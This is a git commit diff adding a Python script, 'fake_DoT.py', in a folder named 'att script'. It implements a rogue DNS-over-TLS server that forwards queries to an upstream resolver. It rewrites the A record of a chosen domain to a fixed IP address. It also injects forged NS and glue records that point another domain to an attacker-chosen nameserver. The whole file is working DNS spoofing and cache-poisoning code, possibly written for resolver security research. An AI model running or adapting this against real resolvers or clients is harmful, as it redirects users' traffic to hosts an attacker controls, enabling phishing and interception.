diff options
| author | 仇渝淇 <[email protected]> | 2023-11-22 13:29:32 +0000 |
|---|---|---|
| committer | 仇渝淇 <[email protected]> | 2023-11-22 13:29:32 +0000 |
| commit | 270c170cb7cf8c978835aebfd1e15298ce099c4e (patch) | |
| tree | 1e39521b1a40395a90e90673dbf4a0f3ef27a29d | |
| parent | 2b4d97deb5fd20891edc71e5d1ed0c6f232d3740 (diff) | |
Upload New File
| -rw-r--r-- | att script/12/fake_DoT.py | 63 |
1 files changed, 63 insertions, 0 deletions
diff --git a/att script/12/fake_DoT.py b/att script/12/fake_DoT.py new file mode 100644 index 0000000..4e45754 --- /dev/null +++ b/att script/12/fake_DoT.py @@ -0,0 +1,63 @@ +import argparse +import asyncio +import ssl +import socket +import dns.asyncquery +import dns.message +import dns.rcode +import dns.flags +import dns.message +import dns.rrset +from dnslib import DNSRecord + +async def handle_client(reader, writer): + request_data = await reader.read(1024) + request = dns.message.from_wire(request_data[2:]) + #print(request) + dns_request = dns.message.make_query(request.question[0].name, request.question[0].rdtype) + dns_request.id = request.id + #print(dns_request) + dns_response = await dns.asyncquery.udp(q=dns_request, port=53, where='223.5.5.5') + #print(dns_response) + if str(request.question[0].name) == tamper and int(request.question[0].rdtype) == 1: + print('---tamper---', tamper) + dns_response.answer = [dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '39.106.44.126')] + if str(request.question[0].name) == inject: + print('---inject---', inject) + dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]), + dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)] + #print(dns_response) + + response_data = dns_response + record_header = len(response_data.to_wire()).to_bytes(2, 'big') + # 构建完整的TLS响应数据 + tls_response_data = record_header + response_data.to_wire() + writer.write(tls_response_data) + await writer.drain() + writer.close() + +async def start_server(): + # 配置服务器参数 + listen_address = '0.0.0.0' + listen_port = 853 + CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt" # 替换为你的SSL证书文件路径 + KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key" # 替换为你的SSL密钥文件路径 + context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH) + context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE) + # 创建TCP服务器 + server = await asyncio.start_server( + handle_client, listen_address, listen_port, ssl=context) + + print(f'DoT server listening on {listen_address}:{listen_port}') + async with server: + await server.serve_forever() + +parser = argparse.ArgumentParser() +parser.add_argument('-tamper', '--tamper', default='') +parser.add_argument('-inject', '--inject', default='') +parser.add_argument('-ns', '--ns', default='39.106.44.126') +args = parser.parse_args() +tamper = args.tamper +'.' +inject = args.inject +'.' +ns = args.ns +asyncio.run(start_server())
\ No newline at end of file |